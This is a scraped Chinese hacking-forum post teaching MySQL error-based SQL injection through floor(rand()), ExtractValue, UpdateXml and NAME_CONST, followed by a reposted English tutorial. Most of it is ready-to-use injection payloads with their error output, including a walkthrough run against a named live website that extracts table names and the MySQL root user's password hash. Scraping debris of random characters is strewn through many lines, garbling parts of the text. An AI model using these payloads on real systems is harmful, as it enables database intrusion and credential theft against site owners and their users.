找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2966|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:1 y( ~" b# h  {) U
首先进行正常查询:

mysql> select * from article where id = 1;
4 e$ y0 b( w0 F+—-+——-+———+; n8 ?7 v) `9 `$ S3 b
| id | title | content |/ F3 n) C' y% |1 k
+—-+——-+———+
9 C$ H' X6 G) Z/ S6 m9 ]|  1 | test  | do it   |
% I1 C+ A9 y5 q  o. ?- o+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);# U1 S: \/ d9 R
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
. C4 `; {9 T+ t例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);6 h& M2 g+ [+ ]: }, [
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));, p9 @1 e) W6 G& @
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue3 p) G; v' u2 }# P" |! G
测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–2 \4 _0 v* {% T1 s9 d
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’

2 A7 ^3 L2 H. u3 r

4 X# d. w* g* L: }

再收集:


! |7 f) N- y5 F* G  _, Dhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
7 a6 }/ w  _' v1 c6 ~2 J
! l; `5 S. m% ~  KErroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
5 t  X& Z8 B6 I2 v
( {) b; o% G- v6 v% k% |http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)) `6 ?5 W" Z/ O# U

" i, Q3 `9 w2 Z4 ?  K; [& \& ^Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
9 l4 x+ O( S' S2 t5 i( {
9 C* l6 a) I3 o* f& dMYSQL高版本报错注入技巧-利用NAME_CONST注入
2 e8 Y- s- k# s- V* Q+ [It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
0 X5 B- {9 b: y# P; o8 G6 q
) A0 t# Z. f& {7 _: X( G! @3 j( |$ h. c) b1 t; A; F+ q2 M: v
相关信息8 g' _6 V) V' t$ V
3 V+ r7 |* j5 ?: _+ r
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
# c' @8 H4 y6 r) s
8 p6 A& d% z* Z3 E( x! ZCode:
" j3 j5 x5 [' G' x/ SNAME_CONST(DATA, VALUE)2 E, D: p& G4 ]5 G
2 x* |2 i2 J, ~7 O$ N% O( b
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
" R  U5 a$ s5 b& _( m! c- `. v+ l# I
/ k( j1 M- t- H1 F- `. qSELECT NAME_CONST('TEST', 1)5 g: [% V1 K! s
" j% n! `1 H; C0 a( V  T

' X" H6 I; m2 C7 j0 f2 K- e! S4 g. \& m& G. [
|---------------|. U1 d1 q) C+ B  V, w* e
|     TEST      |
) ?, t2 I5 l% X: c( w- d) @! Z|               |
( @3 b% e7 k  Z4 p# n|---------------|
6 G% f2 R* s1 d4 L7 x( s|       1       |
8 p: D! }- i  E$ l) L: q|               |
" k5 O8 ]8 f8 L  w|---------------|3 R& z; t& j- [

7 G! @) X3 z' a; F! ]/ v
9 {4 P% F" K) B+ r4 O) u& q3 ^/ K" p8 h: b- `

' [6 O! @) _( F1 l$ K5 nhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const  g& y" Q; V) i0 U7 k7 |  w& x* h
Intro to MySQL Variables: |. `7 k8 m: Y
* c. L* }9 F2 C! s
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
" n7 `. b1 s$ K1 c+ v
* B0 ~  P6 x" i% [* G3 G9 e6 K4 F. GCode:
$ O) P, p- |! z1 g2 \/ R* ahttp://www.baido.hk/qcwh/content ... ;sid=19&cid=2615 h) N9 x/ e5 j7 S% X; H
# ?- p$ g+ i4 x9 h

( h! Y$ F/ [. g7 J* R3 `- X% i% }- k9 ]$ S4 W; m
' O  j% p4 k/ A6 l& w! i$ a

% _5 q1 c5 g, Y5 N/ jCode:0 z3 i! J( W  O% }' k
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--, s* S! [% {: q5 o- ]
$ a% `2 K8 [+ G# D/ B4 }0 x
" j( x  {' D1 r- J* }: G
VAR = Your MySQL variable.
' _, s+ W( H3 _: T3 L' b' f
* I6 F- [, f* _0 {9 [, LMySQL 5.1.3 Server System Variables7 c- i$ L# H9 h/ |  U3 d  I( R6 p
: x) Q/ C; J; S3 C0 s( L& N
Let's try it out on my site..
# \) o3 D# k' p/ I5 H6 Y+ N
5 D- M4 d8 a0 Y1 h8 v$ x* fCode:' Q9 U7 c! ]' O
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--5 [* c- Y3 H9 {, `  J9 l
8 E/ R7 P9 ]" y; c) H6 ~
Erroruplicate column name '5.0.27-community-nt'. i: Q7 |2 \! s

' C- \7 `( d0 Z4 a- O# v  O
3 Y; Z$ Y% \8 I
7 s: ]; w6 u0 |0 V& j
& E& f1 O2 q( m+ I+ W2 l

3 J: }. e# T6 l0 e, i, M; WNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...% H  z4 I6 z6 y

% N/ c' [8 v" ~8 I7 f) H; W- e9 \Data Extraction
& r7 i: E% J4 D6 [! k* G& `7 }& t6 w$ s
Code:
, Z  c0 Q3 C( Q; V. t+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
5 n! w; n" j* G5 ?2 q4 X3 b
9 A, P/ Z4 U* w7 w7 ^2 k( U9 h
- |6 q8 x7 k3 i+ T) e
We should get a duplicate column 1 error.... A3 I- B$ Q2 R( t: A* L6 K  s! `

4 |1 G( `# Z" YCode:! t4 v. G6 q! T4 c3 Z, w! D, F1 X
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--( L2 x3 e8 r  _) _' Q# q
: N5 M( [& e# @; @4 H+ M: i+ ]9 E
Erroruplicate column name '1* G# m" K# |. p0 m( [
% G! S# }0 _' p5 g* [! w! q
8 S- b. N: B: d
4 l+ B" @( T3 @$ `3 R8 [8 U

0 B& \) \* b$ B  U7 Y  K3 ]

5 ^: N+ _3 `; j  o8 ^/ e% ^/ C. p+ A* q/ ~; a9 L, l  l. r  v
Now let's get the tables out this bitch..
3 b- M% w% R- N9 D# @+ [
0 h7 U7 M: m( b0 h: n1 ?Code:# J) X+ p3 ~0 n5 O
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
; a/ k: w: r. e, X9 c7 q- h$ r

$ d) u  s& R) S- g
" x8 b" e& T: z% {. h) zLet's see if it works here, if it does, we can go on and finish the job.! R8 [9 W9 h/ l1 V

4 E3 S  C# N, B3 ]1 S, b$ {Code:5 w) E; Y; q/ i
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--- o* W1 q" ?, F2 _+ M2 D
9 w6 k& V( j( S% x$ a( a" U0 T- Y

; x7 \$ f; l$ n! Y3 WErroruplicate column name 'com_admanage
. c# I; f! l8 K. }7 b
+ V1 R9 w7 `7 J9 D! P0 l2 N  r

& n+ h. q7 f6 a4 ?* k( @- h
9 R* k# v' @7 n1 ^
; B1 v- i9 o" g; {

/ Q7 {& u' E& R$ {
6 f/ o  w& b* j4 l) W( lNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.8 G$ e* ^! y8 ~4 X
, n% |7 Y0 C3 Q. a. N0 n
Let's get the columns out of the user table..
* r2 S; C4 G! x9 g3 h: Z% c# U4 j
Code:
/ I6 [' Z, u1 i; D3 ]$ A+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
( x! M. r" Y, |2 z4 u3 f+ Q

0 h# [6 l+ q1 ^# r# Q* P6 |, R1 p  y
So mine looks like this, and I get the duplicate column name 'Host'.
2 c) Q& y) J0 M# b1 c
- s' N) x4 x. P: e; \Code:: S, b5 c( t6 S6 a1 \% s4 Q. H
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
$ D4 t& ~5 T0 j. Y: y4 Y$ `' i$ T6 ^! ^$ [9 r
Erroruplicate column name 'Host'
% {- f& r( {1 c) L

# J8 T; w- e% {- Z5 }+ ?- {, u& A* c- _& K2 }% x  X" J
& x) F# M. I/ y) [. }

- W5 n$ z$ y5 l+ W! ]5 l
. Q- O# L, E. o0 P; Z4 {

& l& M$ J  v, f* K; X* OWoot, time to finish this bitch off.2 e& k! k, j8 g9 d+ Y! ?
4 W9 u; G" h: Q2 @* s) E2 t
Code:  i  T5 ?; v) O+ g9 ]9 W
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
$ j) W) u6 {2 T! I+ {

, }0 ]; `5 U6 L2 D0 ?9 \; T" w/ u1 S: M( C
So mine looks like this..., B& w: i9 O* T3 G

/ K% J! F2 V& r9 t2 LCode:
7 h- Z9 {& p2 z- ?2 V+ U5 Mhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--) r6 y( o1 [) O# [$ H; x

( S  y, @5 @+ l' b1 kErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
9 p, F* @: h/ T1 @
7 m! W- [' T" u. _/ M9 k

. y/ e4 i- q* t" B- q3 X# a( F
8 q+ b. }& Z' a6 C
' J7 O9 w1 q5 z- V# \5 R1 @
% o! y" A. `6 d- t  x1 R
8 c, W+ o9 B% j' q
And there we have it, thanks for reading.

- Y1 m- a0 e9 C; |4 Y6 a# V4 [4 |8 o& n2 A! I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表